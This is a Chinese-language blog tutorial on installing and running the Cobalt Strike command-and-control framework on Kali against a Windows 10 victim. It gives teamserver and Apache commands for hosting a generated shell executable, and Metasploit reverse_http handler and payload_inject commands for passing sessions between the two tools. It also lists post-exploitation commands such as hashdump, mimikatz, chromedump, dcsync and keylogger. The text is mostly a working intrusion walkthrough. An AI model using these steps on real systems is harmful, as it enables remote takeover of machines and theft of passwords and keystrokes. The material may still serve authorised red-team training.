Cobalt Strike kali install

环境介绍

  • kali linux 2021
  • Cobalt Strike4.3
  • windows10(受害机)

在kali中安装Cobalt Strike

在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。
进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。
start.jpg
这样便启动了Cobalt Strike
如上会提示登录
这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:

./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码

Cobalt Strike界面介绍

生成shell

首先配置监听
和msfconsole类似,Cobalt Strike也要配置监听。
Cobalt Strike——Listeners——Add
payload
相关参数说明:

参数 说明
name 监听任务的名称 可随意
payload 监听的方式 支持http https TCP
HTTPS HOSTS 主机IP地址
Host Rotation Strategy 主机转移策略 一般默认即可

生成shell
AttacksPackages——windows ececutable

shell
配置windows平台下的shell
windows shell
保存生成的shell
save shell

参数 说明
HTML Application 基于http方式的攻击,如受害者打开网站即可获得shell
MS Office Macro office宏攻击,如打开word文档即可获得shell
Payload Generator 其他方式的payload,如C python vb
windows ececutable 生成windows平台下的shell

Shell上线
将生成的shell放到/var/www/html,并启动apache服务器

cp kali.exe /var/www/html
service apache2 start

当目标主机下载并运行shell后,我们便可以看到回弹。
目标主机上线

对目标主机的操作

对目标主机的操作

interact 命令模式

当我们点击interact后,便会和msfconsole一样,进入命令模式。
现列出常用的命名

参数 说明
argue 匹配进程的欺骗参数
blockdlls 阻止子进程中的非Microsoft DLL
browserpivot 设置浏览器会话
cancel 取消正在进行的下载
cd 改变目录位置
checkin 呼叫总部并发布数据
chromedump 从Google Chrome恢复凭据
clear 清除信标队列
connect 通过TCP连接到目标
covertvpn 部署隐蔽VPN客户端
cp 复制文件
dcsync 从DC提取密码哈希
desktop 查看目标桌面并与之交互
dllinject bbskali.cn
dllload 将反射DLL注入进程
download 文件下载
downloads 列出正在下载的文件
drives 列出目标上的驱动器
elevate 在提升的上下文中生成会话
exit 关闭当前连接
getprivs 对当前令牌启用系统权限
getsystem 提升系统权限
getuid 获取用户ID
hashdump 导出hash密码
keylogger 记录键盘
kill Kill 掉进程
logonpasswords 使用mimikatz转储凭据和哈希
ls 列出文件列表 bbskali.cn
make_token 创建一个 token
mimikatz 运行神器 mimikatz
mkdir 创建一个目录
mv 移动文件
net 网络和主机枚举
upload 上传文件

如获取C盘文件信息

cd /
ls

C盘文件信息

和目标屏幕交互

desktop

桌面交互

其他菜单操作

由于比较多,就不一个个说了。把常用的几个菜单说说。

可视化的文件浏览

Explore-File Browser
文件浏览
对局域网内所有设备扫描

显示目标的所有进程
进程

Cobalt Strike与Msfconsole联动

首先我们在Cobalt Strike中创建一个新的Foreign Http监听

然后在msfconsole中配置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit

返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听

这时,我们返回到msf中便可以看到成功得到回弹。

将msf会话转移到Cobalt Strike

一样,我们先建立一个http的监听

因为在msf中我们已经获得了session
在其配置如下:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run


set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。
然后我们返回到Cobalt Strike这时便可以看到会话了

其他文章推荐

《Cobalt Strike 目标上线微信提示》
《Cobalt Strike入坑指南(利用office文件获取shell)》

未完待续……

最后修改:2023 年 08 月 04 日
如果觉得我的文章对你有用,请随意赞赏